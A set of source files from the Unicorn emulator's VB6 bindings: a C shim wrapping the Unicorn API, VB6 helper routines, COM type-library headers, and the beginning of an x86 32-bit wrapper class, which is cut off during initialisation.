uc_err __stdcall ucs_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, void *user_data, uint64_t begin, uint64_t end, int catagory, int instr_id)
{
#pragma EXPORT
    if (catagory == hc_code) {
        if (vbHookcode == 0) {
            if ((int)callback == 0) return UC_ERR_FETCH_UNMAPPED;
            vbHookcode = (vb_cb_hookcode_t)callback;
        }
        return uc_hook_add(uc, hh, type, c_hook_code, user_data, begin, end);
    }

    if (catagory == hc_block) {
        if (vbHookBlock == 0) {
            if ((int)callback == 0) return UC_ERR_FETCH_UNMAPPED;
            vbHookBlock = (vb_cb_hookcode_t)callback;
        }
        return uc_hook_add(uc, hh, type, c_hook_block, user_data, begin, end);
    }

    if (catagory == hc_mem) { // then it is some combination of memory access hook flags..
        if (vbHookMem == 0) {
            if ((int)callback == 0) return UC_ERR_FETCH_UNMAPPED;
            vbHookMem = (vb_cb_hookmem_t)callback;
        }
        return uc_hook_add(uc, hh, type, c_hook_mem, user_data, begin, end);
    }

    if (catagory == hc_memInvalid) { // then it is some combination of invalid memory access hook flags..
        if (vbInvalidMem == 0) {
            if ((int)callback == 0) return UC_ERR_FETCH_UNMAPPED;
            vbInvalidMem = (vb_cb_eventmem_t)callback;
        }
        return uc_hook_add(uc, hh, type, c_hook_mem_invalid, user_data, begin, end);
    }

    if (catagory == hc_int) {
        if (vbHookInt == 0) {
            if ((int)callback == 0) return UC_ERR_FETCH_UNMAPPED;
            vbHookInt = (vb_cb_hookintr_t)callback;
        }
        return uc_hook_add(uc, hh, UC_HOOK_INTR, c_hook_intr, user_data, begin, end);
    }

    return UC_ERR_ARG;
}

unsigned int __stdcall ucs_dynload(char *path)
{
#pragma EXPORT
    /*#ifdef DYNLOAD
        return uc_dyn_load(path, 0);
    #else*/
    return 1;
    //#endif
}

unsigned int __stdcall ucs_version(unsigned int *major, unsigned int *minor)
{
#pragma EXPORT
    return uc_version(major, minor);
}

bool __stdcall ucs_arch_supported(uc_arch arch)
{
#pragma EXPORT
    return uc_arch_supported(arch);
}

uc_err __stdcall ucs_open(uc_arch arch, uc_mode mode, uc_engine **uc)
{
#pragma EXPORT
    return uc_open(arch, mode, uc);
}

uc_err __stdcall ucs_close(uc_engine *uc)
{
#pragma EXPORT
    return uc_close(uc);
}

uc_err __stdcall ucs_query(uc_engine *uc, uc_query_type type, size_t *result)
{
#pragma EXPORT
    return uc_query(uc, type, result);
}

uc_err __stdcall ucs_errno(uc_engine *uc)
{
#pragma EXPORT
    return uc_errno(uc);
}

const char *__stdcall ucs_strerror(uc_err code)
{
#pragma EXPORT
    return uc_strerror(code);
}

uc_err __stdcall ucs_reg_write(uc_engine *uc, int regid, const void *value)
{
#pragma EXPORT
    return uc_reg_write(uc, regid, value);
}

uc_err __stdcall ucs_reg_read(uc_engine *uc, int regid, void *value)
{
#pragma EXPORT
    return uc_reg_read(uc, regid, value);
}

uc_err __stdcall ucs_reg_write_batch(uc_engine *uc, int *regs, void *const *vals, int count)
{
#pragma EXPORT
    return uc_reg_write_batch(uc, regs, vals, count);
}

uc_err __stdcall ucs_reg_read_batch(uc_engine *uc, int *regs, void **vals, int count)
{
#pragma EXPORT
    return uc_reg_read_batch(uc, regs, vals, count);
}

uc_err __stdcall ucs_mem_write(uc_engine *uc, uint64_t address, const void *bytes, size_t size)
{
#pragma EXPORT
    return uc_mem_write(uc, address, bytes, size);
}

uc_err __stdcall ucs_mem_read(uc_engine *uc, uint64_t address, void *bytes, size_t size)
{
#pragma EXPORT
    return uc_mem_read(uc, address, bytes, size);
}

uc_err __stdcall ucs_emu_start(uc_engine *uc, uint64_t begin, uint64_t until, uint64_t timeout, size_t count)
{
#pragma EXPORT
    return uc_emu_start(uc, begin, until, timeout, count);
}

uc_err __stdcall ucs_emu_stop(uc_engine *uc)
{
#pragma EXPORT
    return uc_emu_stop(uc);
}

uc_err __stdcall ucs_hook_del(uc_engine *uc, uc_hook hh)
{
#pragma EXPORT
    return uc_hook_del(uc, hh);
}

uc_err __stdcall ucs_mem_map(uc_engine *uc, uint64_t address, size_t size, uint32_t perms)
{
#pragma EXPORT
    return uc_mem_map(uc, address, size, perms);
}

// requires link against v1.0
uc_err __stdcall ucs_mem_map_ptr(uc_engine *uc, uint64_t address, size_t size, uint32_t perms, void *ptr)
{
#pragma EXPORT
    return uc_mem_map_ptr(uc, address, size, perms, ptr);
}

uc_err __stdcall ucs_mem_unmap(uc_engine *uc, uint64_t address, size_t size)
{
#pragma EXPORT
    return uc_mem_unmap(uc, address, size);
}

uc_err __stdcall ucs_mem_protect(uc_engine *uc, uint64_t address, size_t size, uint32_t perms)
{
#pragma EXPORT
    return uc_mem_protect(uc, address, size, perms);
}

uc_err __stdcall ucs_mem_regions(uc_engine *uc, uc_mem_region **regions, uint32_t *count)
{
#pragma EXPORT
    return uc_mem_regions(uc, regions, count);
}

uc_err __stdcall ucs_context_alloc(uc_engine *uc, uc_context **context)
{
#pragma EXPORT
    return uc_context_alloc(uc, context);
}

uc_err __stdcall ucs_free(void *mem)
{
#pragma EXPORT
    return uc_free(mem);
}

uc_err __stdcall ucs_context_save(uc_engine *uc, uc_context *context)
{
#pragma EXPORT
    return uc_context_save(uc, context);
}

uc_err __stdcall ucs_context_restore(uc_engine *uc, uc_context *context)
{
#pragma EXPORT
    return uc_context_restore(uc, context);
}

/*
char* asprintf(char* format, ...){
    char *ret = 0;
    if(!format) return 0;

    va_list args;
    va_start(args,format);
    int size = _vscprintf(format, args);

    if(size > 0){
        size++; //for null
        ret = (char*)malloc(size+2);
        if(ret) _vsnprintf(ret, size, format, args);
    }

    va_end(args);
    return ret;
}*/

#ifdef INCLUDE_DISASM
int __stdcall disasm_addr(uc_engine *uc, uint32_t va, char *str, int bufLen)
{
#pragma EXPORT
    uint32_t instr_len = 0;
    int readLen = 15;
    uint8_t data[32];
    INSTRUCTION inst;

    if (bufLen < 100) return -1;

    // the longest x86 instruction is 15 bytes. what if we are at the tail end
    // of an allocation? try to read as much as we can..
    while (uc_mem_read(uc, va, data, readLen) != 0) {
        readLen--;
        if (readLen == 0) return -2;
    }

    instr_len = get_instruction(&inst, data, MODE_32);
    if (instr_len == 0) return -3;

    get_instruction_string(&inst, FORMAT_INTEL, va, str, bufLen);

    /*
    if(inst.type == INSTRUCTION_TYPE_JMP || inst.type == INSTRUCTION_TYPE_JMPC){
        if(inst.op1.type == OPERAND_TYPE_IMMEDIATE){
            if(strlen(str) + 6 < bufLen){
                if(getJmpTarget(str) < va){
                    strcat(str," ^^");
                }else{
                    strcat(str," vv");
                }
            }
        }
    }*/

    return instr_len;
}
#endif

// maps and writes in one shot, auto handles alignment..
uc_err __stdcall mem_write_block(uc_engine *uc, uint64_t address, void *data, uint32_t size, uint32_t perm)
{
#pragma EXPORT
    uc_err x;
    uint64_t base = address;
    uint32_t sz = size;

    // round the base down to the containing 4k page boundary..
    while (base % 0x1000 != 0) {
        base--;
        if (base == 0) break;
    }

    sz += address - base; // if data starts mid block, we need to alloc more than just size..
    // ..and round the allocation size up to a 4k multiple
    while (sz % 0x1000 != 0) {
        sz++;
    }

    x = uc_mem_map(uc, base, sz, perm);
    if (x) return x;

    x = uc_mem_write(uc, address, (void *)data, size);
    if (x) return x;

    return UC_ERR_OK;
}

void addStr(_CollectionPtr p, char *str)
{
    _variant_t vv;
    vv.SetString(str);
    p->Add(&vv.GetVARIANT());
}

uc_err __stdcall get_memMap(uc_engine *uc, _CollectionPtr *pColl)
{
#pragma EXPORT
    uc_mem_region *regions;
    uint32_t count;
    char tmp[200]; // max 46 chars used

    uc_err err = uc_mem_regions(uc, &regions, &count);
    if (err != UC_ERR_OK) return err;

    for (uint32_t i = 0; i < count; i++) {
        sprintf(tmp, "&h%llx,&h%llx,&h%x", regions[i].begin, regions[i].end, regions[i].perms);
        addStr(*pColl, tmp);
    }

    //free(regions); //https://github.com/unicorn-engine/unicorn/pull/373#issuecomment-271187118
    uc_free((void *)regions);
    return err;
}

enum op {
    op_add = 0, op_sub = 1, op_div = 2, op_mul = 3, op_mod = 4,
    op_xor = 5, op_and = 6, op_or = 7, op_rsh = 8, op_lsh = 9,
    op_gt = 10, op_lt = 11, op_gteq = 12, op_lteq = 13
};

unsigned int __stdcall ULong(unsigned int v1, unsigned int v2, int operation)
{
#pragma EXPORT
    switch (operation) {
    case op_add:  return v1 + v2;
    case op_sub:  return v1 - v2;
    case op_div:  return v1 / v2;
    case op_mul:  return v1 * v2;
    case op_mod:  return v1 % v2;
    case op_xor:  return v1 ^ v2;
    case op_and:  return v1 & v2;
    case op_or:   return v1 | v2;
    case op_rsh:  return v1 >> v2;
    case op_lsh:  return v1 << v2;
    case op_gt:   return (v1 > v2 ? 1 : 0);
    case op_lt:   return (v1 < v2 ? 1 : 0);
    case op_gteq: return (v1 >= v2 ? 1 : 0);
    case op_lteq: return (v1 <= v2 ? 1 : 0);
    }
    return -1;
}

unicorn-2.1.1/bindings/vb6/misc.bas

Attribute VB_Name = "misc"
Option Explicit

Public sharedMemory() As Byte 'in a module so it never goes out of scope and becomes unallocated..

Public Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
Public Declare Function FreeLibrary Lib "kernel32" (ByVal hLibModule As Long) As Long
Public Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
Public Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Public Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long

Enum op
    op_add = 0
    op_sub = 1
    op_div = 2
    op_mul = 3
    op_mod = 4
    op_xor = 5
    op_and = 6
    op_or = 7
    op_rsh = 8
    op_lsh = 9
    op_gt = 10
    op_lt = 11
    op_gteq = 12
    op_lteq = 13
End Enum

'unsigned math operations
Public Declare Function ULong Lib "ucvbshim.dll" (ByVal v1 As Long, ByVal v2 As Long, ByVal operation As op) As Long

'this is just a quick way to support x64 numbers in vb6. it's lite, but can be bulky to work with.
'if we wanted to really work with x64 values, we would compile a library such as the following into the shim layer:
'   https://github.com/dzzie/libs/tree/master/vb6_utypes
Private Type Bit64Currency
    value As Currency
End Type

Private Type Bit64Integer
    LowValue As Long
    HighValue As Long
End Type

Global Const LANG_US = &H409

Function lng2Cur(v As Long) As Currency
    Dim c As Bit64Currency
    Dim dl As Bit64Integer
    dl.LowValue = v
    dl.HighValue = 0
    LSet c = dl
    lng2Cur = c.value
End Function

Function cur2lng(v As Currency) As Long
    Dim c As Bit64Currency
    Dim dl As Bit64Integer
    c.value = v
    LSet dl = c
    cur2lng = dl.LowValue
End Function

Function KeyExistsInCollection(c As Collection, val As String) As Boolean
    On Error GoTo nope
    Dim t
    t = c(val)
    KeyExistsInCollection = True
    Exit Function
nope:
    KeyExistsInCollection = False
End Function

Function FileExists(path As String) As Boolean
    On Error GoTo nope
    If Len(path) = 0 Then Exit Function
    If Right(path, 1) = "\" Then Exit Function
    If Dir(path, vbHidden Or vbNormal Or vbReadOnly Or vbSystem) <> "" Then FileExists = True
    Exit Function
nope:
    FileExists = False
End Function

Function FileNameFromPath(fullpath) As String
    Dim tmp
    If InStr(fullpath, "\") > 0 Then
        tmp = Split(fullpath, "\")
        FileNameFromPath = CStr(tmp(UBound(tmp)))
    End If
End Function

Function GetParentFolder(path) As String
    Dim tmp, a As Long
    If Right(path, 1) = "\" Then
        GetParentFolder = path
    Else
        a = InStrRev(path, "\")
        If a > 0 Then
            GetParentFolder = Mid(path, 1, a)
        End If
    End If
End Function

Function FolderExists(ByVal path As String) As Boolean
    On Error GoTo nope
    If Len(path) = 0 Then Exit Function
    If Right(path, 1) <> "\" Then path = path & "\"
    If Dir(path, vbDirectory) <> "" Then FolderExists = True
    Exit Function
nope:
    FolderExists = False
End Function

Function HexDump(bAryOrStrData, Optional hexOnly = 0, Optional ByVal startAt As Long = 1, Optional ByVal Length As Long = -1) As String
    Dim s() As String, chars As String, tmp As String
    On Error Resume Next
    Dim ary() As Byte
    Dim offset As Long
    Const LANG_US = &H409
    Dim i As Long, tt, h, x

    offset = 0

    If TypeName(bAryOrStrData) = "Byte()" Then
        ary() = bAryOrStrData
    Else
        ary = StrConv(CStr(bAryOrStrData), vbFromUnicode, LANG_US)
    End If

    If startAt < 1 Then startAt = 1
    If Length < 1 Then Length = -1

    While startAt Mod 16 <> 0
        startAt = startAt - 1
    Wend
    startAt = startAt + 1

    chars = "   "
    For i = startAt To UBound(ary) + 1
        tt = Hex(ary(i - 1))
        If Len(tt) = 1 Then tt = "0" & tt
        tmp = tmp & tt & " "
        x = ary(i - 1)
        'chars = chars & IIf((x > 32 And x < 127) Or x > 191, Chr(x), ".") 'x > 191 causes \x0 problems on non us systems... asc(chr(x)) = 0
        chars = chars & IIf((x > 32 And x < 127), Chr(x), ".")
        If i > 1 And i Mod 16 = 0 Then
            h = Hex(offset)
            While Len(h) < 6: h = "0" & h: Wend
            If hexOnly = 0 Then
                push s, h & "   " & tmp & chars
            Else
                push s, tmp
            End If
            offset = offset + 16
            tmp = Empty
            chars = "   "
        End If
        If Length <> -1 Then
            Length = Length - 1
            If Length = 0 Then Exit For
        End If
    Next

    'if the read length was not mod 16 = 0, then we have part of a line to account for
    If tmp <> Empty Then
        If hexOnly = 0 Then
            h = Hex(offset)
            While Len(h) < 6: h = "0" & h: Wend
            h = h & "   " & tmp
            While Len(h) <= 56: h = h & " ": Wend
            push s, h & chars
        Else
            push s, tmp
        End If
    End If

    HexDump = Join(s, vbCrLf)

    If hexOnly <> 0 Then
        HexDump = Replace(HexDump, " ", "")
        HexDump = Replace(HexDump, vbCrLf, "")
    End If
End Function

Public Function toBytes(ByVal hexstr, Optional strRet As Boolean = False)
'supports:
'   11 22 33 44   spaced hex chars
'   11223344      run-together hex strings
'   11,22,33,44   csv hex
'   \x11,0x22     misc C source rips
'
'ignores common C source prefixes, operators, delimiters, and whitespace
'
'not supported:
'   1,2,3,4       all hex chars must have two chars, even if delimited
'
'a version which supports more formats is here:
'   https://github.com/dzzie/libs/blob/master/dzrt/globals.cls

    Dim ret As String, x As String, str As String
    Dim r() As Byte, b As Byte, b1 As Byte
    Dim foundDecimal As Boolean, tmp, i, a, a2
    Dim pos As Long, marker As String

    On Error GoTo nope

    str = Replace(hexstr, vbCr, Empty)
    str = Replace(str, vbLf, Empty)
    str = Replace(str, vbTab, Empty)
    str = Replace(str, Chr(0), Empty)
    str = Replace(str, "{", Empty)
    str = Replace(str, "}", Empty)
    str = Replace(str, ";", Empty)
    str = Replace(str, "+", Empty)
    str = Replace(str, """""", Empty)
    str = Replace(str, "'", Empty)
    str = Replace(str, " ", Empty)
    str = Replace(str, "0x", Empty)
    str = Replace(str, "\x", Empty)
    str = Replace(str, ",", Empty)

    For i = 1 To Len(str) Step 2
        x = Mid(str, i, 2)
        If Not isHexChar(x, b) Then Exit Function
        bpush r(), b
    Next

    If strRet Then
        toBytes = StrConv(r, vbUnicode, LANG_US)
    Else
        toBytes = r
    End If

nope:
End Function

Private Sub bpush(bAry() As Byte, b As Byte) 'this modifies the parent ary object
    On Error GoTo init
    Dim x As Long

    x = UBound(bAry) '<- throws an error if not initialized
    ReDim Preserve bAry(UBound(bAry) + 1)
    bAry(UBound(bAry)) = b

    Exit Sub

init:
    ReDim bAry(0)
    bAry(0) = b
End Sub

Sub push(ary, value) 'this modifies the parent ary object
    On Error GoTo init
    Dim x

    x = UBound(ary)
    ReDim Preserve ary(x + 1)

    If IsObject(value) Then
        Set ary(x + 1) = value
    Else
        ary(x + 1) = value
    End If

    Exit Sub

init:
    ReDim ary(0)
    If IsObject(value) Then
        Set ary(0) = value
    Else
        ary(0) = value
    End If
End Sub

Public Function isHexChar(hexValue As String, Optional b As Byte) As Boolean
    On Error Resume Next
    Dim v As Long

    If Len(hexValue) = 0 Then GoTo nope
    If Len(hexValue) > 2 Then GoTo nope 'expecting a hex char code like FF or 90

    v = CLng("&h" & hexValue)
    If Err.Number <> 0 Then GoTo nope 'invalid hex code

    b = CByte(v)
    If Err.Number <> 0 Then GoTo nope 'shouldn't happen.. > 255 can't be with len() <= 2 ?

    isHexChar = True
    Exit Function

nope:
    Err.Clear
    isHexChar = False
End Function

Function hhex(b As Byte) As String
    hhex = Hex(b)
    If Len(hhex) = 1 Then hhex = "0" & hhex
End Function

Function rpad(x, i, Optional c = " ")
    rpad = Left(x & String(i, c), i)
End Function

Function lbCopy(lstBox As Object) As String
    Dim i As Long
    Dim tmp() As String
    For i = 0 To lstBox.ListCount - 1
        push tmp, lstBox.List(i)
    Next
    lbCopy = Join(tmp, vbCrLf)
End Function

unicorn-2.1.1/bindings/vb6/msvbvm60.tlh

// Created by Microsoft (R) C/C++ Compiler Version 15.00.21022.08 (2358e5d7).
//
// d:\projects\col\col\debug\msvbvm60.tlh
//
// C++ source equivalent of Win32 type library C:\\windows\system32\msvbvm60.dll
// compiler-generated file created 03/21/16 at 11:45:20 - DO NOT EDIT!

#pragma once
#pragma pack(push, 8)

#include <comdef.h>

//
// Forward references and typedefs
//

struct __declspec(uuid("000204ef-0000-0000-c000-000000000046")) /* LIBID */ __VBA;
struct __declspec(uuid("a4c46780-499f-101b-bb78-00aa00383cbb")) /* dual interface */ _Collection;
struct /* coclass */ Collection;

//
// Smart pointer typedef declarations
//

_COM_SMARTPTR_TYPEDEF(_Collection, __uuidof(_Collection));

//
// Type library items
//

struct __declspec(uuid("a4c46780-499f-101b-bb78-00aa00383cbb")) _Collection : IDispatch
{
    //
    // Wrapper methods for error-handling
    //

    _variant_t Item(VARIANT *Index);
    HRESULT Add(VARIANT *Item, VARIANT *Key = &vtMissing, VARIANT *Before = &vtMissing, VARIANT *After = &vtMissing);
    long Count();
    HRESULT Remove(VARIANT *Index);
    IUnknownPtr _NewEnum();

    //
    // Raw methods provided by interface
    //

    virtual HRESULT __stdcall raw_Item(/*[in]*/ VARIANT *Index, /*[out,retval]*/ VARIANT *pvarRet) = 0;
    virtual HRESULT __stdcall raw_Add(/*[in]*/ VARIANT *Item, /*[in]*/ VARIANT *Key = &vtMissing, /*[in]*/ VARIANT *Before = &vtMissing, /*[in]*/ VARIANT *After = &vtMissing) = 0;
    virtual HRESULT __stdcall raw_Count(/*[out,retval]*/ long *pi4) = 0;
    virtual HRESULT __stdcall raw_Remove(/*[in]*/ VARIANT *Index) = 0;
    virtual HRESULT __stdcall raw__NewEnum(/*[out,retval]*/ IUnknown **ppunk) = 0;
};

struct __declspec(uuid("a4c4671c-499f-101b-bb78-00aa00383cbb")) Collection; // [ default ] interface _Collection

//
// Wrapper method implementations
//

#include "msvbvm60.tli"

#pragma pack(pop)
unicorn-2.1.1/bindings/vb6/msvbvm60.tli

// Created by Microsoft (R) C/C++ Compiler Version 15.00.21022.08 (2358e5d7).
//
// d:\projects\col\col\debug\msvbvm60.tli
//
// Wrapper implementations for Win32 type library C:\\windows\system32\msvbvm60.dll
// compiler-generated file created 03/21/16 at 11:45:20 - DO NOT EDIT!

#pragma once

//
// interface _Collection wrapper method implementations
//

inline _variant_t _Collection::Item(VARIANT *Index)
{
    VARIANT _result;
    VariantInit(&_result);
    HRESULT _hr = raw_Item(Index, &_result);
    if (FAILED(_hr))
        _com_issue_errorex(_hr, this, __uuidof(this));
    return _variant_t(_result, false);
}

inline HRESULT _Collection::Add(VARIANT *Item, VARIANT *Key, VARIANT *Before, VARIANT *After)
{
    HRESULT _hr = raw_Add(Item, Key, Before, After);
    if (FAILED(_hr))
        _com_issue_errorex(_hr, this, __uuidof(this));
    return _hr;
}

inline long _Collection::Count()
{
    long _result = 0;
    HRESULT _hr = raw_Count(&_result);
    if (FAILED(_hr))
        _com_issue_errorex(_hr, this, __uuidof(this));
    return _result;
}

inline HRESULT _Collection::Remove(VARIANT *Index)
{
    HRESULT _hr = raw_Remove(Index);
    if (FAILED(_hr))
        _com_issue_errorex(_hr, this, __uuidof(this));
    return _hr;
}

inline IUnknownPtr _Collection::_NewEnum()
{
    IUnknown *_result = 0;
    HRESULT _hr = raw__NewEnum(&_result);
    if (FAILED(_hr))
        _com_issue_errorex(_hr, this, __uuidof(this));
    return IUnknownPtr(_result, false);
}

unicorn-2.1.1/bindings/vb6/screenshot.png   [binary PNG image omitted]
unicorn-2.1.1/bindings/vb6/ucIntel32.cls

VERSION 1.0 CLASS
BEGIN
  MultiUse = -1  'True
  Persistable = 0  'NotPersistable
  DataBindingBehavior = 0  'vbNone
  DataSourceBehavior = 0  'vbNone
  MTSTransactionMode = 0  'NotAnMTSObject
END
Attribute VB_Name = "ucIntel32"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = True
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Option Explicit

'Unicorn Engine x86 32bit wrapper class for vb6
'Contributed by: FireEye FLARE team
'Author: David Zimmer <david.zimmer@fireeye.com>, <dzzie@yahoo.com>
'License: Apache 2.0

'we hide the extra labor of x64 conversion from the user. I could simplify
'this at the C shim layer but I might write an x64 class later
'
'since the vb long type only natively supports signed math, I have also handed off a couple
'calculations in this class to a C stub just to be safe.
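'(illustrative note added here: the pitfall is that as unsigned values
' &H7FFFFFFF < &H80000000, yet in VB6 the expression "&H7FFFFFFF < &H80000000"
' is False because &H80000000 is the negative Long -2147483648; helpers like
' ULong(a, b, op_lteq) from the support module are the safe way to compare
' addresses in the upper 2gb range)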
'
'you can find a full unsigned and x64 safe library for vb6 here:
'   https://github.com/dzzie/libs/tree/master/vb6_utypes

Public hLib As Long
Public uc As Long
Public errMsg As String
Public Version As String
Public major As Long
Public minor As Long

Private r32 As Variant
Private r16 As Variant
Private r8 As Variant
Private rs_ As Variant
Private rs_Name As Variant
Private r32_Name As Variant
Private r16_Name As Variant
Private r8_Name As Variant
Private hooks As New Collection
Private m_DisasmOk As Boolean

Event CodeHook(ByVal address As Long, ByVal size As Long)
Event BlockHook(ByVal address As Long, ByVal size As Long)
Event MemAccess(ByVal t As uc_mem_type, ByVal address As Long, ByVal size As Long, ByVal value As Long)
Event InvalidMem(ByVal t As uc_mem_type, ByVal address As Long, ByVal size As Long, ByVal value As Long, ByRef continue As Boolean)
Event Interrupt(ByVal intno As Long)

'our vb enum is 0 based then mapped to the real C values so we can loop them to dump with name lookup
'these sub enums also keep the intellisense lists short and focused when reading/writing vals
'they are accessed through reg32, reg16, reg8, rs properties, or use raw full enum through reg property
'the names of each can be looked up through the reg32n etc properties
Public Enum reg_32
    eax_r = 0
    ecx_r = 1
    edx_r = 2
    ebx_r = 3
    esp_r = 4
    ebp_r = 5
    esi_r = 6
    edi_r = 7
End Enum

Public Enum reg_16
    ax_r = 0
    cx_r = 1
    dx_r = 2
    bx_r = 3
    sp_r = 4
    bp_r = 5
    si_r = 6
    di_r = 7
End Enum

Public Enum reg_8
    ah_r = 0
    ch_r = 1
    dh_r = 2
    bh_r = 3
    al_r = 4
    cl_r = 5
    dl_r = 6
    bl_r = 7
End Enum

Public Enum reg_Special
    CS_r = 0
    DS_r = 1
    ES_r = 2
    FS_r = 3
    GS_r = 4
    SS_r = 5
    IDTR_r = 6
    GDTR_r = 7
    LDTR_r = 8
End Enum

Property Get DisasmAvail() As Boolean
    DisasmAvail = m_DisasmOk
End Property

Property Get lastError() As Long
    lastError = ucs_errno(uc)
End Property

Property Get hadErr() As Boolean
    If Len(errMsg) > 0 Then hadErr = True
End Property

Property Get eip() As Long
    Dim e As uc_err, value As Long
    e = ucs_reg_read(uc, UC_X86_REG_EIP, value)
    eip = value
End Property

Property Let eip(v As Long)
    Dim e As uc_err
    e = ucs_reg_write(uc, UC_X86_REG_EIP, v)
End Property

Property Get eflags() As Long
    Dim e As uc_err, value As Long
    e = ucs_reg_read(uc, UC_X86_REG_EFLAGS, value)
    eflags = value
End Property

Property Let eflags(v As Long)
    Dim e As uc_err
    e = ucs_reg_write(uc, UC_X86_REG_EFLAGS, v)
End Property
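'---- usage note (sketch added for illustration; "uc32" is a hypothetical instance) ----
'registers are exposed as plain properties, e.g.:
'   Dim uc32 As New ucIntel32
'   If uc32.hadErr Then Debug.Print uc32.errMsg
'   uc32.reg32(eax_r) = &H1000           'simplified 0-based sub enum
'   uc32.reg(UC_X86_REG_EDX) = 5         'or the raw unicorn register enum
'   Debug.Print Hex(uc32.eip)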
'full access to all registers if you need it..
Property Get reg(r As uc_x86_reg) As Long
    Dim e As uc_err, value As Long
    e = ucs_reg_read(uc, r, value)
    reg = value
End Property

Property Let reg(r As uc_x86_reg, value As Long)
    Dim e As uc_err
    e = ucs_reg_write(uc, r, value)
End Property

'32 bit registers
Property Get reg32(r As reg_32) As Long
    Dim e As uc_err, value As Long
    If r < 0 Or r > UBound(r32) Then Exit Property
    e = ucs_reg_read(uc, r32(r), value)
    reg32 = value
End Property

Property Let reg32(r As reg_32, value As Long)
    Dim e As uc_err
    If r < 0 Or r > UBound(r32) Then Exit Property
    e = ucs_reg_write(uc, r32(r), value)
End Property

'16 bit registers
Property Get reg16(r As reg_16) As Long
    Dim e As uc_err, value As Long
    If r < 0 Or r > UBound(r16) Then Exit Property
    e = ucs_reg_read(uc, r16(r), value)
    reg16 = value And &HFFFF& 'mask instead of CInt, values >= &H8000 would overflow an Integer
End Property

Property Let reg16(r As reg_16, ByVal value As Long)
    Dim e As uc_err
    value = value And &HFFFF
    If r < 0 Or r > UBound(r16) Then Exit Property
    e = ucs_reg_write(uc, r16(r), value)
End Property

'8 bit registers
Property Get reg8(r As reg_8) As Long
    Dim e As uc_err, value As Long
    If r < 0 Or r > UBound(r8) Then Exit Property
    e = ucs_reg_read(uc, r8(r), value)
    reg8 = value
End Property

Property Let reg8(r As reg_8, ByVal value As Long)
    Dim e As uc_err
    value = value And &HFF
    If r < 0 Or r > UBound(r8) Then Exit Property
    e = ucs_reg_write(uc, r8(r), value)
End Property

'special registers
Property Get rs(r As reg_Special) As Long
    Dim e As uc_err, value As Long
    If r < 0 Or r > UBound(rs_) Then Exit Property
    e = ucs_reg_read(uc, rs_(r), value)
    rs = value
End Property

Property Let rs(r As reg_Special, ByVal value As Long)
    Dim e As uc_err
    If r < 0 Or r > UBound(rs_) Then Exit Property
    e = ucs_reg_write(uc, rs_(r), value)
End Property

'reg index to name translation for looping
Property Get reg32n(r As reg_32) As String
    If r < 0 Or r > UBound(r32_Name) Then Exit Property
    reg32n = r32_Name(r)
End Property

Property Get reg16n(r As reg_16) As String
    If r < 0 Or r > UBound(r16_Name) Then Exit Property
    reg16n = r16_Name(r)
End Property

Property Get reg8n(r As reg_8) As String
    If r < 0 Or r > UBound(r8_Name) Then Exit Property
    reg8n = r8_Name(r)
End Property

Property Get rsn(r As reg_Special) As String
    If r < 0 Or r > UBound(rs_Name) Then Exit Property
    rsn = rs_Name(r)
End Property

Function regDump(Optional includeState As Boolean = True) As String
    Dim i As Long
    Dim tmp As String
    For i = 0 To UBound(r32)
        tmp = tmp & reg32n(i) & "=" & Hex(reg32(i)) & "  "
        'if i mod 3 = 0 and i <> 0 then tmp = tmp & vbcrlf
    Next
    regDump = tmp
    If includeState Then
        regDump = regDump & "eip=" & Hex(Me.eip) & " " & dumpFlags()
    End If
End Function

Function dumpFlags() As String

    Dim ret() As String
    Dim n As Variant
    Dim i As Long
    Dim flags As Long

    'http://www.c-jump.com/CIS77/ASM/Instructions/I77_0050_eflags.htm
    n = Array("C ", 0, "P ", 0, "A ", 0, "Z ", "S ", _
              "T ", "I ", "D ", "O ", "IOPL ", "IOPL ", "NT ", 0, _
              "RF ", "VM ", "AC ", "VIF ", "VIP ", "ID ", 0)

    flags = Me.eflags
    push ret, "EFL " & Hex(flags)
    For i = 0 To 21
        If flags And ULong(1, i, op_lsh) Then
            If n(i) <> 0 Then push ret, n(i)
        End If
    Next

    dumpFlags = Join(ret, " ")

End Function
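'e.g. with eflags = &H246, dumpFlags() returns roughly "EFL 246 P  Z  I"
'(parity/zero/interrupt bits set; illustrative note, spacing comes from the name table above)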
Private Sub Class_Initialize()

    Dim e As uc_err

    'mapping our simplified to real values..
    r32 = Array(UC_X86_REG_EAX, UC_X86_REG_ECX, UC_X86_REG_EDX, UC_X86_REG_EBX, UC_X86_REG_ESP, UC_X86_REG_EBP, UC_X86_REG_ESI, UC_X86_REG_EDI)
    r32_Name = Array("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi")

    r16 = Array(UC_X86_REG_AX, UC_X86_REG_CX, UC_X86_REG_DX, UC_X86_REG_BX, UC_X86_REG_SP, UC_X86_REG_BP, UC_X86_REG_SI, UC_X86_REG_DI)
    r16_Name = Array("ax", "cx", "dx", "bx", "sp", "bp", "si", "di")

    r8 = Array(UC_X86_REG_AH, UC_X86_REG_CH, UC_X86_REG_DH, UC_X86_REG_BH, UC_X86_REG_AL, UC_X86_REG_CL, UC_X86_REG_DL, UC_X86_REG_Bl)
    r8_Name = Array("ah", "ch", "dh", "bh", "al", "cl", "dl", "bl")

    rs_ = Array(UC_X86_REG_CS, UC_X86_REG_DS, UC_X86_REG_ES, UC_X86_REG_FS, UC_X86_REG_GS, UC_X86_REG_SS, UC_X86_REG_IDTR, UC_X86_REG_GDTR, UC_X86_REG_LDTR)
    rs_Name = Array("cs", "ds", "es", "fs", "gs", "ss", "idtr", "gdtr", "ldtr")

    'just to ensure IDE finds the dll before we try to use it...
    Const dllName As String = "ucvbshim.dll"

    If Len(UNICORN_PATH) = 0 Then
        UNICORN_PATH = vbNullString
    ElseIf FolderExists(UNICORN_PATH) Then
        UNICORN_PATH = UNICORN_PATH & IIf(Right(UNICORN_PATH, 1) = "\", "", "\") & "unicorn.dll"
    End If

    If hLib = 0 Then
        hLib = GetModuleHandle(dllName)
        If hLib = 0 Then
